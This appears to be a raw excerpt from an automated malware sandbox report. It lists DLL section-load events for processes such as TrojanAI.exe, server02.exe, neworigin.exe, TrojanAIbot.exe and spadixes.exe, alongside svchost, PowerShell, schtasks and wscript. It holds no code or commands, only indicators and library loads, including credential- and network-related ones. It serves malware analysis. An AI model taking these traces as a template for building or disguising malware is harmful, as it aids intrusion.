                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: linkinfo.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: ntshrui.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: cscapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\server02.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: schannel.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: mskeyprotect.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: ncryptsslp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: msasn1.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: gpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: vaultcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: dpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\neworigin.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: apphelp.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: mscoree.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: profapi.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptsp.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: rsaenh.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: cryptbase.dll
                          Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exeSection loaded: edputil.dll
                          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
                          Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: ntmarta.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wsock32.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: version.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: winmm.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: mpr.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wininet.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: iphlpapi.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: userenv.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: uxtheme.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: kernel.appcore.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: windows.storage.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: wldp.dll
                          Source: C:\Users\user\AppData\Local\bothsided\spadixes.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dnsapi.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iphlpapi.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ondemandconnroutehelper.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winnsi.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msasn1.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: gpapi.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc6.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: dhcpcsvc.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: webio.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dll
                          Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dll
